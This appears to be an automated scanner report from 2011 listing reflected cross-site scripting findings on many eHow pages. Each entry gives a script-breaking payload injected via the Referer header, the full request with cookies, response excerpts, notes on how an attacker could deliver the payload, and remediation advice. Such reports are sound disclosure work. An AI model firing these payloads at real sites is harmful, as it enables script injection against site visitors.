<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=cc7c2"><script>alert(1)</script>4d661957df4" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4484</script><script>alert(1)</script>1cc7f90f443 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.ehow.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=f4484</script><script>alert(1)</script>1cc7f90f443
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a6f</script><script>alert(1)</script>bf656815b44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /MailingList.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=20a6f</script><script>alert(1)</script>bf656815b44
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:28 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31410
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow of the Day | eHow.com</title> <meta chars ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94767</script><script>alert(1)</script>72faf05749a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_us/about_us.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=94767</script><script>alert(1)</script>72faf05749a
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32688
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdb2f</script><script>alert(1)</script>413feb209a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_us/contact_us.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=fdb2f</script><script>alert(1)</script>413feb209a8
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31984
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd7d</script><script>alert(1)</script>84ee8a351de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_us/faq_ehow.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8cd7d</script><script>alert(1)</script>84ee8a351de
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49896
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e8b6</script><script>alert(1)</script>e22c3df7afd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_us/link_to_us.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7e8b6</script><script>alert(1)</script>e22c3df7afd
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31379
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Link to eHow | eHow.com</title> <meta c ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3df8</script><script>alert(1)</script>1e4d372cf6c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e3df8</script><script>alert(1)</script>1e4d372cf6c
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60925
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8239f</script><script>alert(1)</script>b9c8de16e0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-and-crafts/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8239f</script><script>alert(1)</script>b9c8de16e0a
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72207
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Arts & Crafts - How To Information | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b132</script><script>alert(1)</script>3c0febc8d3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-and-entertainment/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=7b132</script><script>alert(1)</script>3c0febc8d3d
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71928
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Arts & Entertainment - How To Information | eHow. ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1952</script><script>alert(1)</script>8a38f022236 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /at-home/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e1952</script><script>alert(1)</script>8a38f022236
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49317
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> eHow Home Blog | eHow.com </title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3f97</script><script>alert(1)</script>8cdcd28db28 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beauty-and-personal-care/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c3f97</script><script>alert(1)</script>8cdcd28db28
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73789
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Beauty & Personal Care - How To Information | eHo ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da28b</script><script>alert(1)</script>c0d891d3e78 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=da28b</script><script>alert(1)</script>c0d891d3e78
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78995
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Official eHow Blog - How To Do Just About Every ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc313</script><script>alert(1)</script>8cd44ec7a9c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=cc313</script><script>alert(1)</script>8cd44ec7a9c
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:36 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75446
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Business - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba477</script><script>alert(1)</script>69ee7d46388 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /car-repair-and-maintenance/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ba477</script><script>alert(1)</script>69ee7d46388
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72871
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Car Repair & Maintenance - How To Information | e ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64203</script><script>alert(1)</script>24a7a2730b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
